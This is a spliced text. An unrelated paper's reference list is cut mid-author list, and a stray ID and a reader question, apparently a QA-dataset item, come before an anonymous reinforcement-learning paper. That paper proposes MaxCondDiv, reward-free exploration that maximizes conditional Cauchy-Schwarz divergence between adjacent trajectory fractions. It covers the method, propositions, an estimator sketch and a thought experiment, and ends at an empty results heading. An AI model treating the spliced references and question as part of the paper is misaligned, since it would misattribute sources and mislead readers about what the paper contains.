Marta Bañón, Pinzhen Chen, Barry Haddow, Kenneth Heafield, Hieu Hoang, Miquel Esplà-Gomis, Mikel L. Forcada, Amir Kamran, Faheem Kirefu, Philipp Koehn, Sergio Ortiz Rojas, Leopoldo Pla Sempere, Gema Ramírez-Sánchez, Elsa Sarrías, Marek Strelec, Brian Thompson, William Waite, Dion Wiggins, and Jaume Zaragoza. ParaCrawl: Web-scale acquisition of parallel corpora. In *Proceedings of the 58th Annual Meeting of the Association for Computational Linguistics*, pp. 4555–4567, Online, July 2020. Association for Computational Linguistics. doi: 10.18653/v1/2020.acl-main.417. URL https://aclanthology.org/2020.acl-main.417.

Samyadeep Basu, Phil Pope, and Soheil Feizi. Influence functions in deep learning are fragile. In *International Conference on Learning Representations*, 2021. URL https://openreview.net/forum?id=xHKVVHGDOEk.

Ondřej Bojar, Rajen Chatterjee, Christian Federmann, Yvette Graham, Barry Haddow, Shujian Huang, Matthias Huck, Philipp Koehn, Qun Liu, Varvara Logacheva, Christof Monz, Matteo Negri, Matt Post, Raphael Rubino, Lucia Specia, and Marco Turchi. Findings of the 2017 conference on machine translation (wmt17). In *Proceedings of the Second Conference on Machine Translation, Volume 2: Shared Task Papers*, pp. 169–214, Copenhagen, Denmark, September 2017. Association for Computational Linguistics. URL http://www.aclweb.org/anthology/W17-4717.

Clément L. Canonne. A short note on an inequality between kl and tv, 2023. URL https://arxiv.org/abs/2202.07198.

R. Dennis Cook and Sanford Weisberg. *Residuals and influence in regression*. Chapman & Hall, 1975. URL https://conservancy.umn.edu/handle/11299/37076.

Angela Fan, Mike Lewis, and Yann Dauphin. Hierarchical neural story generation. In *Proceedings of the 56th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers)*, pp. 889–898, Melbourne, Australia, July 2018. Association for Computational Linguistics. doi: 10.18653/v1/P18-1082. URL https://aclanthology.org/P18-1082.

Simin Fan, Matteo Pagliardini, and Martin Jaggi. Doge: Domain reweighting with generalization estimation, 2024.

Marcello Federico, Sebastian Stüker, and François Yvon (eds.). *Proceedings of the 11th International Workshop on Spoken Language Translation: Evaluation Campaign*, Lake Tahoe, California, December 4-5 2014. URL https://aclanthology.org/2014.iwslt-evaluation.0.

Tanya Goyal, Jiacheng Xu, Junyi Jessy Li, and Greg Durrett. Training dynamics for text summarization models.
In *Findings of the Association for Computational Linguistics: ACL 2022*, pp. 2061–2073, Dublin, Ireland, May 2022. Association for Computational Linguistics. doi: 10.18653/v1/2022.findings-acl.163. URL https://aclanthology.org/2022.findings-acl.163.

Roger Grosse, Juhan Bae, Cem Anil, Nelson Elhage, Alex Tamkin, Amirhossein Tajdini, Benoit Steiner, Dustin Li, Esin Durmus, Ethan Perez, Evan Hubinger, Kamilė Lukošiūtė, Karina Nguyen,
pHaX00wxFy
What is meant by the idea, repeated many times in the text and summarized in the abstract: “the divergence between the agent’s estimation of the transition probability between the next state given current state-action pairs … in two adjacent trajectory fractions”?
REWARD-FREE EXPLORATION BY CONDITIONAL DIVERGENCE MAXIMIZATION

Anonymous authors
Paper under double-blind review

ABSTRACT

We propose maximum conditional divergence (MaxCondDiv), a new curiosity-driven exploration strategy that encourages the agent to learn in the absence of extrinsic rewards, effectively separating exploration from exploitation. Our central idea is to define curiosity as the divergence between the agent's estimates of the transition probability of the next state given current state-action pairs (i.e., \( P(s_{t+1} | s_t, a_t) \)) in two adjacent trajectory fractions. Distinct from other recent intrinsically motivated exploration approaches, which usually incur complex models in their learning procedures, our exploration is model-free and explicitly estimates this divergence from multivariate continuous observations, thanks to the favorable properties of the Cauchy-Schwarz divergence. Therefore, MaxCondDiv is less computationally expensive and reduces internal model selection bias. We establish a connection between MaxCondDiv and the famed maximum entropy (MaxEnt) exploration, and observe that MaxCondDiv achieves a wider exploration range and faster convergence. Our exploration also encourages the agent to acquire intricate skills in a fully reward-free environment.

1 INTRODUCTION

Over the past few years, Reinforcement Learning (RL) has achieved remarkable success in addressing challenges in fields like robotics (Mnih et al., 2015) and games (Silver et al., 2016). Nonetheless, RL's practical applications in real-world scenarios are still restricted due to the high variability and lack of user control over the availability of dense rewards, which are critical to the timeliness and success of RL. To counteract this shortcoming, intrinsically motivated exploration (Amin et al., 2021) has been put forth to encourage the agent to explore unknown states in the absence of extrinsic rewards by offering an internal motivation, such as diversity (Eysenbach et al., 2019), novelty (Ostrovski et al., 2017; Tao et al., 2020), or curiosity (Pathak et al., 2017; Burda et al., 2019). Existing intrinsically motivated exploration approaches can be roughly divided into two categories with distinct goals (Amin et al., 2021): space coverage approaches encourage an agent to visit more unexplored states or state-action pairs in a shorter amount of time, whereas curiosity-driven approaches seek to explore areas where the agent's prediction of the next state given current state-action pairs (i.e., \( P(s_{t+1} | s_t, a_t) \)) has high uncertainty. The maximum entropy (MaxEnt) principle has emerged as a prominent technique in the first category. One way to achieve MaxEnt is by minimizing the KL divergence between a uniform distribution and a target distribution, because a uniform distribution guarantees full coverage of the space and also has maximum entropy. Recently, Hazan et al. (2019) introduced the concept of maximum state entropy exploration (MSEE) in a broader spectrum of RL environments. Subsequently, multiple approaches have been proposed to enhance it, such as (Zhang et al., 2021; Seo et al., 2021; Yuan et al., 2022; Nedergaard & Cook, 2022; Yarats et al., 2021; Tiapkin et al., 2023), just to name a few. However, the utilization of multiple policies in these MaxEnt-based methods and the objective of a uniform distribution over the state space may cause the agent to spend a considerable amount of time near the starting states, leading to longer training times.
Conversely, curiosity-driven methods encourage exploration of unpredictable parts of the environment and prioritize the discovery of novel states beyond the initial ones. Usually, the dynamics of the environment are characterized by the transition probability of the next state given current state-action pairs, i.e., \( P(s_{t+1} | s_t, a_t) \). Hence, most approaches in this category use an auxiliary predictive model \( P_{\theta}(s_{t+1}|s_t, a_t) \) with parameters \( \theta \), such as linear regression (Schmidhuber, 1991), convolutional neural networks (Pathak et al., 2017) and fully-connected neural networks (Stadie et al., 2015; Yu et al., 2020; Pathak et al., 2017), to model the transition probability. Once the model is trained, intrinsic rewards can be defined with either the prediction error of the next state \( s_{t+1} \) or the information gain (Lopes & Mengue, 2022), which can be approximated by the difference between the estimates of the transition probability before and after new triplet samples \( \{s_{t+1}, s_t, a_t\} \) are included.

The above-mentioned curiosity-driven techniques are model-based in the sense that they never explicitly estimate the true divergence of the transition probability \( P(s_{t+1}|s_t, a_t) \) from observations \( \{s_{t+1}, s_t, a_t\}_{t=1}^{\infty} \) in the trajectory. Rather, they model it implicitly with an internal parametric auxiliary model \( P_{\theta}(s_{t+1}|s_t, a_t) \) for ease of estimation. Hence, the exploration depends heavily on the predictive performance of the auxiliary models, and it is also hard for practitioners to decide which model to choose. If the model is well trained, such that it learns precisely the conditional distribution \( P(s_{t+1}|s_t, a_t) \), the RL agent may encounter vanishing intrinsic rewards; on the contrary, if the model is poorly fitted, intrinsic rewards explode. Besides, the inclusion of auxiliary models introduces additional hyperparameters and parameters, making it challenging to maintain a balance between the model and the RL agent.

In this paper, we develop Maximum Conditional Divergence (MaxCondDiv), a new curiosity-driven exploration approach for exploration RL that does not rely on external rewards or parameterized models for prediction. To this end, akin to the MaxEnt principle, it leverages an information-theoretic measure to explicitly model and estimate the divergence of \( P(s_{t+1}|s_t, a_t) \) in two adjacent trajectory fractions (i.e., \( \max D(P_c(s_{t+1}|s_t, a_t); P_f(s_{t+1}|s_t, a_t)) \), where \( c \) stands for “current” and \( f \) stands for “former”), based only on observation triplets \( \{s_{t+1}, s_t, a_t\} \), in a model-free manner. Despite the simplicity of this idea, a precise estimation of the divergence between two conditional distributions is a non-trivial task, especially when the estimator is required to operate in a multivariate continuous space. To address this issue, we estimate \( D(P_c(s_{t+1}|s_t, a_t); P_f(s_{t+1}|s_t, a_t)) \) by introducing the notion of the Cauchy-Schwarz (CS) divergence (Principe et al., 2000; Yu et al., 2023), which significantly reduces the difficulty of estimation and enjoys several properties more desirable than those of the conventional Kullback–Leibler (KL) divergence and maximum mean discrepancy (MMD) (Gretton et al., 2012).
To summarize, we make the following key contributions:

• By explicitly modeling the conditional distribution \( P(s_{t+1}|s_t, a_t) \) without training an auxiliary model, we propose MaxCondDiv as a new reward-free exploration strategy applicable to multivariate observations, which encourages the agent to explore divergent transition probabilities and leads to high information gain.

• Distinct from \( f \)-divergences such as the KL divergence and integral probability metrics such as MMD, the use of the CS divergence simplifies the estimation and avoids unstable training.

• We also establish the connection between MaxCondDiv and MaxEnt.

• Using MaxCondDiv, our agent can acquire intricate skills such as jumping and flipping in a fully reward-free environment. Using the number of visited states as a metric, our method outperforms other state-of-the-art reward-free exploration methods in three Mujoco environments.

2 BACKGROUND KNOWLEDGE AND RELATED WORKS

2.1 Rényi’s \( \alpha \)-Entropy and Cauchy-Schwarz Divergence

In information theory, a natural extension of the well-known Shannon entropy is Rényi’s \( \alpha \)-entropy (Rényi, 1961). For a random variable \( x \) with probability density function (PDF) \( p(x) \) on a finite set \( X \), the \( \alpha \)-entropy \( H_\alpha(x) \) is defined as: \[ H_\alpha(x) = \frac{1}{1 - \alpha} \log \int_X p^\alpha(x) dx. \tag{1} \] Similarly, for two random variables \( x \) and \( y \) with joint PDF \( p(x, y) \), the joint entropy is given by: \[ H_\alpha(x, y) = \frac{1}{1 - \alpha} \log \int_Y \int_X p^\alpha(x, y) dxdy. \tag{2} \] Thus, the $\alpha$-order mutual information\footnote{There is no generally accepted definition of $\alpha$-order mutual information (Verdú, 2015). We take the one (Cachin, 1997) that is inspired by the strong chain rule of Shannon entropy, i.e., $H(x, y) = H(x) + H(y|x)$.} can be expressed as (Cachin, 1997; Teixeira et al., 2012): $$I_\alpha(x, y) = H_\alpha(x) + H_\alpha(y) - H_\alpha(x, y). \tag{3}$$ Likewise, extensions of the relative entropy also exist; a modified version of Rényi’s $\alpha$-relative entropy (or divergence) between PDFs $p$ and $q$ is given by (Lutwak et al., 2005): $$D_\alpha(p; q) = \frac{1}{1-\alpha} \log \left( \frac{\int q^{\alpha-1} p}{\int p^\alpha} \right). \tag{4}$$ The limiting cases of (1) and (4) for $\alpha \to 1$ are Shannon’s entropy and the KL divergence, respectively. It turns out that for the case of $\alpha = 2$, the above quantities can be expressed as functions of inner products between PDFs, which makes them easy to estimate in reproducing kernel Hilbert spaces (RKHS) (Principe, 2010). In particular, the quadratic entropy and divergence are given by: $$H_2(x) = -\log \int_X p^2(x) dx, \quad \text{and} \quad D_{CS}(p; q) = -\log \left( \frac{\left( \int pq \right)^2}{\int p^2 \int q^2} \right). \tag{5}$$ Eq. (5) is also called the Cauchy-Schwarz (CS) divergence, as it can be obtained by applying the CS inequality associated with $p(x)$ and $q(x)$: $$\left| \int p(x)q(x) dx \right|^2 \leq \int |p(x)|^2 dx \int |q(x)|^2 dx. \tag{6}$$
The CS inequality also holds for two conditional distributions $p(y|x)$ and $q(y|x)$ (Yu et al., 2023); the resulting conditional CS divergence can be expressed naturally as: $$\begin{aligned} D_{CS}(p(y|x); q(y|x)) &= -2 \log \left( \int_X \int_Y p(y|x)\,q(y|x)\, dx\, dy \right) + \log \left( \int_X \int_Y p^2(y|x)\, dx\, dy \right) + \log \left( \int_X \int_Y q^2(y|x)\, dx\, dy \right) \\ &= -2 \log \left( \int_X \int_Y \frac{p(x,y)\,q(x,y)}{p(x)\,q(x)}\, dx\, dy \right) + \log \left( \int_X \int_Y \frac{p^2(x,y)}{p^2(x)}\, dx\, dy \right) + \log \left( \int_X \int_Y \frac{q^2(x,y)}{q^2(x)}\, dx\, dy \right). \end{aligned} \tag{7}$$

### 2.2 INTRINSICALLY-MOTIVATED EXPLORATION RL

The existing intrinsically motivated exploration approaches can be broadly categorized into two types: space coverage and curiosity-driven approaches. Approaches rooted in the MaxEnt principle for achieving space coverage have gained popularity recently due to their strong mathematical interpretability and performance. For example, maximum state entropy exploration (MSEE) by Hazan et al. (2019) guarantees uniform coverage of the state space and offers a proof of policy improvement when utilizing the APPROXPLAN/DENSITYEST oracle. Later, MaxRényi (Zhang et al., 2021) replaced the Shannon entropy with the Rényi entropy and maximizes the entropy in the joint space of actions and states. RE3 (Seo et al., 2021) incorporates neural encoders, enabling application in video-oriented environments like Atari. RISE (Yuan et al., 2022) integrates both RE3 and MaxRényi, leveraging them to accelerate the learning process. In Nedergaard & Cook (2022) and Yarats et al. (2021), \(k\)-means and prototypical representations are introduced to enhance the quality of latent vectors. Tiapkin et al. (2023) study MSEE to learn a policy leading to an \(\epsilon\)-optimal maximum and reduce the sample complexity.

The other type, curiosity-driven approaches, has roots tracing back to the 1970s, when the concepts of “observer's information” and “interestingness” were introduced (Pfaffelhuber, 1972; Lenat, 1976). Recent popular prediction-error-based approaches, largely driven by advancements in deep neural networks (DNNs), fall under this category. For instance, ICM (Pathak et al., 2017) utilizes a CNN as the auxiliary model to predict the next image, whereas GIRL (Yu et al., 2020) implements a variational autoencoder (VAE) (Kingma & Welling, 2014) to model the transitions in environments. Similarly, Shyam et al. (2019) aim to maximize the Jensen-Shannon divergence of fully-connected neural network outputs. In contrast to these methods, we pursue a model-free approach. Our method shares the closest resemblance with the model-free curiosity-driven approach introduced by Storck et al. (1995), which estimates the transition probability directly from observations. However, this method can only be used in tabular discrete environments, as it calculates the transition probability by counting. In contrast, our method is applicable to both discrete and continuous environments and is compatible with arbitrary RL techniques, thanks to the use of the CS divergence.

3 Maximum Conditional Divergence (MaxCondDiv) Exploration

The intrinsically-motivated exploration RL problem can be defined as policy search in an infinite-horizon Markov decision process (MDP) defined by a 6-tuple \((S, A, p_s, r^E, r^I, \gamma)\), where \(S\) is the set of all possible states and \(A\) is the set of all possible actions.
\(p_s(s_{t+1}|s_t, a_t)\) is the transition probability density of the next state \(s_{t+1} \in S\) given the current state \(s_t \in S\) and action \(a_t \in A\). The environment emits extrinsic rewards given by the extrinsic reward function \(r^E(s_t, a_t)\). Meanwhile, the intrinsic reward function \(r^I(\rho_{t-})\) determines the intrinsic rewards based on the historical data \(\rho_{t-}\) collected before time step \(t\). \(\gamma \in [0, 1)\) is a discount factor. The optimal policy aims to learn a policy \(\pi(a_t|s_t): S \mapsto A\) by maximizing extrinsic and intrinsic rewards: \[ \pi^* = \arg\max_\pi \mathbb{E}_{\rho \sim \pi} \left( \sum_{t=0}^{T-1} \gamma^t [r^E(s_t, a_t) + \beta r^I(\rho_{t-})] \right), \tag{8} \] where \(\beta\) is a hyperparameter that determines the relative importance of intrinsic and extrinsic rewards, and \(\rho = \{s_{t+1}, s_t, a_t\}_{t=0}^{T-1}\) is the data collected by executing policy \(\pi\). We specifically consider the reward-free case, where the extrinsic reward \(r^E(s_t, a_t)\) is consistently zero. Our method aims to design an intrinsic reward function \(r^I(\rho_{t-})\) for exploring the functional space of transitions \(p_s(s_{t+1}|s_t, a_t)\) without relying on any extrinsic reward \(r^E(s_t, a_t)\).

3.1 Conditional Cauchy-Schwarz Divergence (CCSD) Reward Function

Our focus is on enabling the agent to acquire novel transitions in contrast to recently visited samples. To specify a transition sample, we require a triplet sample consisting of the next state \(s_{t+1}\), the current state \(s_t\), and the action \(a_t\). Hence, a complete trajectory \(T_E = \{(s_2, s_1, a_1), (s_3, s_2, a_2), \ldots, (s_T, s_{T-1}, a_{T-1}), \ldots\}\), \(E\) for “entire”, is defined to be the sequence of triplet samples, as illustrated in Fig. 1. Meanwhile, we utilize a first-in-first-out replay buffer (sliding window) to locally store transition samples. We refer to this subsequence of the trajectory \(T_E\) as a “trajectory fraction”, denoted by \(T\). The trajectory fraction \(T\) contains data for a maximum of \(2\tau\) previous time steps. We then define \(\mathbb{P}_f(s_{t+1}|s_t, a_t)\), \(f\) for “former”, as the transition probability \(P(s_{t+1}|s_t, a_t)\) estimated from the triplets \((s_{t+1}, s_t, a_t)\) sampled from \(T_{1:\tau}\) (i.e., the 1st to \(\tau\)-th elements of \(T\)). Similarly, let \(\mathbb{P}_c(s_{t+1}|s_t, a_t)\), \(c\) for “current”, be the transition probability \(P(s_{t+1}|s_t, a_t)\) estimated from the triplets sampled from \(T_{\tau+1:2\tau}\). Our framework estimates an intrinsic reward defined as the divergence between \(\mathbb{P}_f(s_{t+1}|s_t, a_t)\) and \(\mathbb{P}_c(s_{t+1}|s_t, a_t)\), and learns a policy by maximizing this conditional divergence (MaxCondDiv). More formally, our optimal policy aims to maximize the divergence between “former” and “current” transitions in the trajectory fraction \(T\): \[ \pi^*_{\text{MaxCondDiv}} = \arg\max_\pi \mathbb{E}_{\rho \sim \pi} \left( \sum_{T \in T_E} D(\mathbb{P}_c(s_{t+1}|s_t, a_t); \mathbb{P}_f(s_{t+1}|s_t, a_t)) \right). \tag{9} \]

Figure 1: The structure of our replay buffer. We choose the length of \( T \) to be \( 2\tau \) and divide it equally into “current” and “former” parts. The split point is arbitrary, and overlapping fractions are also possible. If we designate the \( T_{1:2\tau-1} \) samples as “former” and the \( T_{1:2\tau} \) samples as “current”, our approach is consistent with that of Storck et al. (1995).
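A minimal sketch of this sliding-window buffer (our own code, with hypothetical names) makes the “former”/“current” split concrete:

```python
from collections import deque

class TrajectoryFraction:
    """FIFO window over the last 2*tau transition triplets (s_next, s, a).
    The older half is the 'former' fraction, the newer half the 'current' one."""

    def __init__(self, tau):
        self.tau = tau
        self.buf = deque(maxlen=2 * tau)

    def push(self, s_next, s, a):
        self.buf.append((s_next, s, a))

    def fractions(self):
        """Return (former, current) halves, or None until the window is full."""
        if len(self.buf) < 2 * self.tau:
            return None
        triplets = list(self.buf)
        return triplets[: self.tau], triplets[self.tau :]
```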
3.2 Why the Conditional Cauchy-Schwarz Divergence (CCSD) for MaxCondDiv?

In principle, any divergence could be used in the context of MaxCondDiv. We underscore the rationale for choosing the CS divergence rather than the popular KL divergence and MMD. For the KL divergence \[ D_{KL}(p; q) = \int p \log \left( \frac{p}{q} \right), \tag{10} \] its conditional extension follows a decomposition rule (Cover, 1999): \[ D_{KL}(\mathbb{P}_c(s_{t+1}|s_t, a_t); \mathbb{P}_f(s_{t+1}|s_t, a_t)) = D_{KL}(\mathbb{P}_c(s_{t+1}, s_t, a_t); \mathbb{P}_f(s_{t+1}, s_t, a_t)) - D_{KL}(\mathbb{P}_c(s_t, a_t); \mathbb{P}_f(s_t, a_t)), \tag{11} \] in which both terms are usually evaluated by a \( k \)-NN estimator (Wang et al., 2009). However, the term \( \log \left( \frac{p}{q} \right) \) explodes when \( q \to 0 \), a scenario commonly encountered in our RL experiments. This instability can disrupt the learning process of RL agents. Further empirical details regarding MaxCondDiv with the KL divergence can be found in Section 4.3 and Appendix C.2. Fortunately, the CS divergence does not have this issue: it is much more stable and never explodes (see also our discussion in Appendix D.1). Theoretically, the CS divergence is no greater than the KL divergence for Gaussian distributed data. Therefore, it provides a viable alternative objective when the KL divergence is hard to apply in practice.

Proposition 1. For two arbitrary d-variate Gaussian distributions \( p \sim \mathcal{N}(\mu_1, \Sigma_1) \) and \( q \sim \mathcal{N}(\mu_2, \Sigma_2) \), we have: \[ D_{CS}(p; q) \leq \min \{ D_{KL}(p; q), D_{KL}(q; p) \}. \tag{12} \] All proofs can be found in Appendix A.

Moreover, compared with the \( k \)-NN estimator, our empirical estimator of the CS divergence is differentiable, which makes it promising for potential applications in deep multi-modal learning, where the RL module may play a critical role. MMD embeds probability functions in a reproducing kernel Hilbert space (RKHS). If we take the conditional MMD definition of Ren et al. (2016), the estimator involves a matrix inverse and an extra hyper-parameter, which also makes the training highly unstable and time-consuming. See Appendix C.1 for more discussion. In this paper, we suggest the conditional Cauchy-Schwarz divergence (CCSD) for MaxCondDiv: \[ \begin{aligned} D_{CS}(\mathbb{P}_f(s_{t+1}|s_t, a_t); \mathbb{P}_c(s_{t+1}|s_t, a_t)) = &-2 \log \left( \int_{S_{t+1}} \int_{\{S_t, A_t\}} \frac{\mathbb{P}_f(s_{t+1}, \{s_t, a_t\})\,\mathbb{P}_c(s_{t+1}, \{s_t, a_t\})}{\mathbb{P}_f(\{s_t, a_t\})\,\mathbb{P}_c(\{s_t, a_t\})}\, d\{s_t, a_t\}\, ds_{t+1} \right) \\ &+ \log \left( \int_{S_{t+1}} \int_{\{S_t, A_t\}} \frac{\mathbb{P}_f^2(s_{t+1}, \{s_t, a_t\})}{\mathbb{P}_f^2(\{s_t, a_t\})}\, d\{s_t, a_t\}\, ds_{t+1} \right) + \log \left( \int_{S_{t+1}} \int_{\{S_t, A_t\}} \frac{\mathbb{P}_c^2(s_{t+1}, \{s_t, a_t\})}{\mathbb{P}_c^2(\{s_t, a_t\})}\, d\{s_t, a_t\}\, ds_{t+1} \right), \end{aligned} \tag{13} \] where \( S_{t+1} \) and \( \{S_t, A_t\} \) are the domains of \( s_{t+1} \) and \( \{s_t, a_t\} \), respectively.

### 3.3 Practical Methods for Accurately Estimating the CCSD Intrinsic Reward

**Proposition 2** (Empirical estimator of \( D_{CS}(\mathbb{P}_f(s_{t+1}|s_t, a_t); \mathbb{P}_c(s_{t+1}|s_t, a_t)) \), Yu et al. (2023)). Given observations in the \( 2\tau \)-length trajectory fraction \( T = \{[(s_{t+1})^i, \{s_t, a_t\}^i]\}_{i=1}^{2\tau} \), divide them into two fractions such that \( \{[(s_{t+1})^i, \{s_t, a_t\}^i]\}_{i=1}^{\tau} \) are sampled from the distribution \( \mathbb{P}_f(s_{t+1}, \{s_t, a_t\}) \) and \( \{[(s_{t+1})^i, \{s_t, a_t\}^i]\}_{i=\tau+1}^{2\tau} \) are sampled from \( \mathbb{P}_c(s_{t+1}, \{s_t, a_t\}) \).
Let \( K_f \) and \( L_f \) denote, respectively, the Gram matrices\footnote{In kernel learning, the Gram or kernel matrix is a symmetric matrix whose entries are inner products of the corresponding data points in a reproducing kernel Hilbert space (RKHS), defined by the kernel function \( \kappa \).} of the concatenated variable \( \{s_t, a_t\} \) and the variable \( s_{t+1} \) in the distribution \( \mathbb{P}_f \). That is, \((K_f)_{ij} = \kappa(\{s_t, a_t\}^i - \{s_t, a_t\}^j)\) and \((L_f)_{ij} = \kappa((s_{t+1})^i - (s_{t+1})^j)\) for \( i, j = 1 : \tau \), in which \( \kappa \) is a Gaussian kernel of the form \( \kappa(a) = \exp \left( -\frac{\|a\|^2}{2\sigma^2} \right) \). Similarly, let \( K_c \) and \( L_c \) denote, respectively, the Gram matrices of the variable \( \{s_t, a_t\} \) and the variable \( s_{t+1} \) in the distribution \( \mathbb{P}_c \). Meanwhile, let \( K_{fc} \in \mathbb{R}^{\tau \times \tau} \) (i.e., \((K_{fc})_{ij} = \kappa(\{s_t, a_t\}^i - \{s_t, a_t\}^j)\) for \( i = 1 : \tau \) and \( j = \tau + 1 : 2\tau \)) denote the Gram matrix of the variable \( \{s_t, a_t\} \) from distribution \( \mathbb{P}_f \) to distribution \( \mathbb{P}_c \), and \( L_{fc} \in \mathbb{R}^{\tau \times \tau} \) the Gram matrix of the variable \( s_{t+1} \) from distribution \( \mathbb{P}_f \) to distribution \( \mathbb{P}_c \). The Gram matrices \( K_{cf} \) and \( L_{cf} \) are defined similarly. The empirical estimate of \( D_{CS}(\mathbb{P}_f(s_{t+1}|s_t, a_t); \mathbb{P}_c(s_{t+1}|s_t, a_t)) \) is given by: \[ \begin{aligned} \hat{D}_{CS}(\mathbb{P}_f(s_{t+1}|s_t, a_t); \mathbb{P}_c(s_{t+1}|s_t, a_t)) = &\log \left( \sum_{j=1}^{\tau} \frac{\sum_{i=1}^{\tau} (K_f)_{ji} (L_f)_{ji}}{\left( \sum_{i=1}^{\tau} (K_f)_{ji} \right)^2} \right) + \log \left( \sum_{j=1}^{\tau} \frac{\sum_{i=1}^{\tau} (K_c)_{ji} (L_c)_{ji}}{\left( \sum_{i=1}^{\tau} (K_c)_{ji} \right)^2} \right) \\ &- \log \left( \sum_{j=1}^{\tau} \frac{\sum_{i=1}^{\tau} (K_{fc})_{ji} (L_{fc})_{ji}}{\left( \sum_{i=1}^{\tau} (K_{fc})_{ji} \right)^2} \right) - \log \left( \sum_{j=1}^{\tau} \frac{\sum_{i=1}^{\tau} (K_{cf})_{ji} (L_{cf})_{ji}}{\left( \sum_{i=1}^{\tau} (K_{cf})_{ji} \right)^2} \right). \end{aligned} \tag{14} \] We offer a visualization in Appendix D.2 and provide an implementation in Appendix E to facilitate comprehension of the Gram matrix. The estimator exhibits low computational complexity of \( O(N^2) \) in the number of samples \( N \). The CCSD intrinsic reward can be combined with any RL method, e.g., Q-learning (Watkins & Dayan, 1992) or PPO (Schulman et al., 2017). We summarize the training pseudo code in Algorithm 1.
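To make Eq. (14) concrete, here is a direct NumPy transcription (our sketch; the variable names and the fixed kernel bandwidth are our assumptions, while Appendix E contains the authors' actual implementation):

```python
import numpy as np

def gram(A, B, sigma=1.0):
    """Gaussian Gram matrix kappa(a_i - b_j) between row-stacked sample sets."""
    d2 = ((A[:, None, :] - B[None, :, :]) ** 2).sum(-1)
    return np.exp(-d2 / (2.0 * sigma ** 2))

def ccsd_hat(sa_f, sn_f, sa_c, sn_c, sigma=1.0):
    """Empirical conditional CS divergence of Eq. (14).

    sa_f, sa_c: (tau, d_s + d_a) concatenated state-action pairs of the
    'former' and 'current' fractions; sn_f, sn_c: (tau, d_s) next states.
    """
    def term(K, L):
        # sum_j [ sum_i K_ji * L_ji / (sum_i K_ji)^2 ], then take the log
        return np.log(((K * L).sum(axis=1) / K.sum(axis=1) ** 2).sum())

    Kf, Lf = gram(sa_f, sa_f, sigma), gram(sn_f, sn_f, sigma)
    Kc, Lc = gram(sa_c, sa_c, sigma), gram(sn_c, sn_c, sigma)
    Kfc, Lfc = gram(sa_f, sa_c, sigma), gram(sn_f, sn_c, sigma)
    Kcf, Lcf = Kfc.T, Lfc.T                    # Gaussian kernels are symmetric
    return term(Kf, Lf) + term(Kc, Lc) - term(Kfc, Lfc) - term(Kcf, Lcf)
```

In a training loop, the value returned for the current window would serve as the intrinsic reward \( r^I(\rho_{t-}) \) fed to the RL backbone (e.g., Q-learning or PPO).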
### 3.4 Connection between MaxCondDiv and MaxEnt

**Proposition 3.** Let \( X \) and \( Y \) be two random variables with marginal PDFs \( p_X(x) = p_X(X = x) \) and \( p_Y(y) = p_Y(Y = y) \), respectively, where \( x \in \mathcal{R} \) and \( y \in \mathcal{R} \). Let \( p_{XY}(x, y) = p_{XY}(X = x, Y = y) \) denote the joint PDF. We have: \[ \frac{1}{2} H_2(x) + \frac{1}{2} H_2(y) - I_2(x, y) \geq D_{CS}(p_X; p_Y) \tag{15} \] iff: \[ \int_{r \in \mathcal{R}} p_X(X = r)\, p_Y(Y = r)\, dr \geq \int_{y \in \mathcal{R}} \int_{x \in \mathcal{R}} p_{XY}^2(x, y)\, dx\, dy, \tag{16} \] where \( H_2(\cdot) \) and \( I_2(\cdot,\cdot) \) are the 2nd-order Rényi entropy and mutual information, as defined in Eq. (1) and Eq. (3), respectively. We justify Proposition 3 in Appendix A.3.

For two variables \( X \) and \( Y \), maximizing their CS divergence \( D_{CS}(p_X; p_Y) \) also maximizes a lower bound of the sum of the 2nd-order Rényi entropies of \( X \) and \( Y \) minus their 2nd-order Rényi mutual information. This applies to our case by substituting \( X \) and \( Y \) with \( s_{t+1} \sim \mathbb{P}_f(\cdot|s_t, a_t) \) and \( s_{t+1} \sim \mathbb{P}_c(\cdot|s_t, a_t) \), respectively. Therefore, maximizing our CCSD is closely related to maximum trajectory entropy exploration (Ekroot & Cover, 1993; Fiechter, 1994), i.e., \( \arg\max_\pi H_{\text{traj}}(p^{\pi}_{\text{traj}}) \), where \( p^{\pi}_{\text{traj}} = \pi(a_1|s_1) \prod_{t=2}^{T} P(s_t|s_{t-1}, a_{t-1})\, \pi(a_t|s_t) \), which can also be obtained by solving entropy-regularized Bellman equations using the entropy of the transition probabilities \( H(s_{t+1}|s_t, a_t) \) as rewards (Fiechter, 1994; Tiapkin et al., 2023). Meanwhile, the last term in Eq. (15) incentivizes independence between the “former” and “current” fractions.

4 EXPERIMENTS

4.1 A THOUGHT EXPERIMENT

To highlight the contrast between MaxEnt and MaxCondDiv, let us consider a thought experiment, visualized in Fig. 2, where optimal policies are realized through a retrospective step. The scenario involves a 2-D open-world environment. In each trial, the agent initiates from the central position \((100, 100)\) and undergoes a sequence of 200 time steps. At each time step, the agent's action is to select an arbitrary direction and move one unit distance. We replicate this procedure 100 times for each exploration policy. As illustrated in Fig. 2, the random policy keeps the agent predominantly near its starting point. Conversely, the optimal MaxEnt policy distributes the agent's trajectory evenly, covering a range that far exceeds what a random policy achieves. Our MaxCondDiv agent selects a random direction to move in the first step, because the only sample in the buffer is \((100, 100)\) and moving in any radial direction is equally divergent. For instance, if the agent moves to \((100, 101)\), the samples in the buffer become \([(100, 100), (100, 101)]\). To maximize the divergence, the agent needs to move to \((100, 102)\) in the next step; deviating from this will result in smaller distances to the previously visited states. Consequently, during each trial, the agent consistently moves in one single random direction. Over 100 trials, the MaxCondDiv agent explores the world more radially, akin to a fireworks display.

We also explore maximizing the divergence between joint distributions (MaxJDiv), i.e., \( D_{CS}(\mathbb{P}_f(s_{t+1}, s_t, a_t); \mathbb{P}_c(s_{t+1}, s_t, a_t)) \), as an alternative to MaxCondDiv. For the joint probability \( P(s_{t+1}, s_t, a_t) = P(s_{t+1}|s_t, a_t)P(s_t, a_t) \), if \( P(s_t, a_t) \) is small (that is, the corresponding state-action pairs are not fully explored), the corresponding \( P(s_{t+1}|s_t, a_t) \) plays only a minor role in the learning objective; if \( P(s_t, a_t) \) is large, the corresponding \( P(s_{t+1}|s_t, a_t) \) has a higher weight. This is in contrast to our goal, in which regions with low \( P(s_t, a_t) \) should be explored more during exploration. Hence, we expect MaxJDiv to be outperformed by MaxCondDiv.

Figure 2: The realization of the thought experiment using the random, optimal MaxEnt, MaxJDiv and MaxCondDiv policies. The MaxEnt principle facilitates exploration by uniformly visiting more states, whereas our MaxCondDiv principle guides exploration by maintaining distance from previously visited states.
4.2 RESULTS ON MOUNTAINCAR AND MAZE

